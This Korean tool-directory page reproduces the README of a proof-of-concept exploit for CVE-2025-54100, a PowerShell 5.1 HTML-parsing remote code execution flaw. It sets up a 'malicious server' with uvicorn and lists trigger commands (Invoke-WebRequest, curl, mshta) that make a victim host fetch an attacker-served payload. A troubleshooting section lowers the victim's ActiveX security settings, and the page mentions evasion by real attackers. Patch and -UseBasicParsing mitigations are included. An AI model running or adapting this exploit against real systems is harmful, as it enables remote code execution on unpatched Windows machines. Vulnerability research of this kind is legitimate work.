Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-54100 — CVE-2025-54100(PowerShell 远程代码执行漏洞) | Kitploit
도구/GitHubGitHub/xiaolvchen/cve-2025-54100
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubxiaolvchen/cve-2025-54100

CVE-2025-54100

CVE-2025-54100(PowerShell 远程代码执行漏洞)

저장소 보기
17개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-54100 – PowerShell 응답 구문 분석 PoC

CVE-2025-54100이 악성 HTML 구문 분석을 통해 Windows PowerShell 5.1에서 **원격 코드 실행(RCE)**을 유발하는 방법을 시연합니다.

CVE-2025-54100이란?

취약점 유형: Invoke-WebRequest가 -UseBasicParsing 매개변수를 사용하지 않을 때 명령 삽입 위험

심각도: CVSS 7.8 (High)

근본 원인: MSHTML 기반 HTML 응답 구문 분석으로 인해 스크립트 실행(예: ActiveXObject)이 허용되고 호출자 컨텍스트에서 실행됨

영향을 받는 시스템:

  • Windows 10 / 11
  • Windows Server 2008–2025
  • PowerShell 5.1

PoC 작동 방식

  1. CVE-2025-54100.py의 FastAPI 서버가 특별히 조작된 HTML 페이로드를 반환합니다.
  2. HTML 내의 스크립트가 WScript.Shell / Shell.Application 등의 ActiveX 객체를 인스턴스화하려고 시도합니다.
  3. 취약한 호스트에서 MSHTML 구문 분석기가 해당 스크립트를 실행하여 calc.exe를 실행함으로써 원격 코드 실행을 시연합니다.
  4. 제공된 페이로드는 최소화되고 파괴적이지 않으며, 연구 및 검증 목적으로만 사용되지만, 추가 분석을 위해 필요에 따라 확장할 수 있습니다.

빠른 시작

환경 요구 사항

  • Python 3.10+ (FastAPI 및 Uvicorn 환경에서 테스트 완료)
  • 종속성 설치
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

악성 서버 실행

PoC HTTP 서비스 시작:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

피해자 호스트에서 트리거

취약한 Windows 호스트에서 -UseBasicParsing을 사용하지 않고 다음 명령을 실행합니다:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (PowerShell의 별칭)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888

포트가 서버 구성과 일치하는지 확인하십시오. 시스템이 취약한 경우, 포함된 스크립트가 MSHTML 구문 분석기를 통해 실행됩니다.

참고: 일부 백신 소프트웨어는 구문 분석 취약점 자체가 여전히 존재하더라도 이 동작을 차단할 수 있습니다.

문제 해결 및 검증

  1. calc.exe가 나타나지 않는 경우:
    1. 피해자 컴퓨터에서 인터넷 옵션을 엽니다.
    2. 보안 → 사용자 지정 수준으로 이동합니다.
    3. **"안전하지 않은 ActiveX 컨트롤 초기화 및 스크립팅"**을 활성화합니다.
    4. -UseBasicParsing 없이 Invoke-WebRequest를 다시 실행합니다.

이 단계는 실행 벡터를 검증하기 위한 것입니다. 실제 공격 시나리오에서는 공격자가 난독화 또는 우회 기술을 사용하여 기본 보안 제한을 회피할 수 있습니다.

검증 증거

PoC

완화 조치

Microsoft는 2025년 12월에 이 취약점을 수정했습니다:

  1. Windows 보안 업데이트를 즉시 설치합니다.

  2. 항상 -UseBasicParsing을 사용하여 MSHTML 구문 분석을 피하십시오:

    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. PowerShell 7+(pwsh)로 마이그레이션합니다. PowerShell Core는 더 이상 MSHTML에 의존하지 않으므로 아키텍처 수준에서 이 문제를 우회합니다.

참고 자료

  • NVD: CVE-2025-54100
  • MSRC: Update Guide
  • GitHub: osman1337-security/CVE-2025-54100
도구 다운로드